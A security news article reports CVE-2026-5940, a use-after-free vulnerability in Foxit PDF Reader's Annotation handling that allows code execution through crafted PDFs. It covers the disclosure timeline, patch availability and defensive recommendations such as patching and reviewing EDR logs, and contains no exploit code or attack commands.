Foxit PDF Reader Zero-Day CVE-2026-5940 Allows Remote Code Execution via Malicious PDFs
A use-after-free vulnerability in Foxit PDF Reader's Annotation object handling, tracked as CVE-2026-5940, allows remote attackers to execute arbitrary code by tricking users into opening a malicious PDF file.
Foxit PDF Reader users are urged to apply a security update immediately following the disclosure of a critical use-after-free vulnerability in the software's Annotation object handling. Tracked as CVE-2026-5940 and reported through the Zero Day Initiative (ZDI-26-301), the flaw carries a CVSS score of 7.8 and allows remote attackers to execute arbitrary code in the context of the current process.
The vulnerability resides in how Foxit PDF Reader manages Annotation objects. Specifically, the software fails to validate the existence of an object before performing operations on it, leading to a use-after-free condition. An attacker can exploit this by convincing a target to open a specially crafted PDF file or visit a malicious web page that triggers the flaw. Once exploited, the attacker gains the ability to execute code with the same privileges as the logged-in user.
Foxit PDF Reader is one of the most widely used PDF viewers globally, particularly in enterprise environments where it is often deployed as a lightweight alternative to Adobe Acrobat. The broad install base makes this vulnerability a high-value target for phishing campaigns and drive-by download attacks. While the CVSS score is 7.8 (High), the actual risk is elevated by the low complexity of exploitation and the fact that no authentication is required beyond user interaction.
Foxit has released a security update to address CVE-2026-5940. Users can find the patch and additional details on Foxit's security bulletins page at https://www.foxit.com/support/security-bulletins.html. The vulnerability was reported to Foxit on March 30, 2026, and the coordinated public advisory was released on April 27, 2026. The discoverer chose to remain anonymous.
This disclosure follows a pattern of increasingly frequent use-after-free vulnerabilities in document readers and office software. Such flaws are particularly dangerous because they can be chained with other exploits to bypass modern exploit mitigations like Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). Security teams should prioritize patching Foxit PDF Reader across their environments and consider blocking PDF downloads from untrusted sources until the update is applied.
Organizations using Foxit PDF Reader should verify that the latest version is installed and review their endpoint detection and response (EDR) logs for any signs of exploitation attempts. Given the straightforward exploitation path and the availability of a patch, the window for attackers to capitalize on unpatched systems is narrow but significant.